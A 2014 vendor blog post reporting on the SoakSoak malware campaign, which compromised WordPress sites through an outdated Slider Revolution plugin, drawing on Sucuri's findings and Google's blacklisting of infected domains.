<img src="https://secure.seem3pick.com/198073.png" style="display:none;">

SoakSoak: The Malware That Has Infected 100,000+ WordPress Sites

Posted by Davide Palumbo on Tue, Dec 16, 2014

malware1A Russian malware called SoakSoak has infected over 100,000 WordPress sites since Sunday, December 14th, turning blogs into attack platforms. The malware attempts to install dangerous programs on your computer that could possibly steal or delete your information. In an attempt to curb the damage, more than 11,000 websites have been blacklisted by Google after they were found infected. According to security firm Sucuri, which is the first security firm that reported on the blacklisting, the malware uses a vulnerability in a slideshow plug-in called Slider Revolution. The Slider Revolution team have already fixed it with updates. Unfortunately, the problem is that the old, vulnerable version of the plug-in is still bundled with WordPress themes, so lots of sites are still using the wrong version. SoakSoak modifies a file in infected sites’ WordPress installation, then it loads a JavaScript malware from the soaksoak.ru domain, which is where the malware’s name comes from.

Researchers at Sucuri are warning that it will be hard to completely eradicate the malware so long as many site owners have no idea that it is there. In order to remove, the malicious code, site administrators will need to update the WordPress premium plug-in. According to Daniel Cid from Sucuri, “The biggest issue is that the RevSlider plugin is a premium plugin; it is not something that everyone can easily upgrade and this can easily become a disaster for website owners. Some website owners have no idea they have it, as it has been packaged and bundled into their website themes. We are currently remediating thousands of sites mehand when engaging with our clients many had no idea the plugin was even within their environment.” In addition, Cid stated that even when website owners try to clean the affected files in their WordPress installation, they may be rapidly re-infected, because of improper cleaning efforts.

Gaming site Dulfy was one of first infected domains to fix the problem by removing code and going behind a firewall, but it may persist on blogs with less diligent administrators indefinitely. In addition, Dulfy’s administrators are not even sure that the fix is permanent. "The firewall will be a temporary measure until we can figure out what is doing it" site owner Kristina Hunter stated.

Over 70 million sites use WordPress as a content management system, from personal blogs to Time.com. This is bad news for anyone who uses the internet. WordPress sites are incredibly common, and Google has only caught a small percentage of the infected sites. Yet, it is not clear if the malware distributors are aiming to steal data or do something even more despicable. In the meanwhile, security researcher Graham Cluley suggested that Google’s decision to blacklist more than 11,000 affected domains soon after the attack was publicized was “a quick-thinking reaction which hopefully will make it more difficult for the attackers to monetize their cybercriminal campaign”.

I could have not written this article without the help of the following sources:

  1. http://www.theguardian.com/technology/2014/dec/16/soaksoak-malware-wordpress-blacklisted-google
  2. http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522


True Cost of Downtime



Tags: Disaster Recovery, Data Security

Subscribe to our BLOG

Recent Posts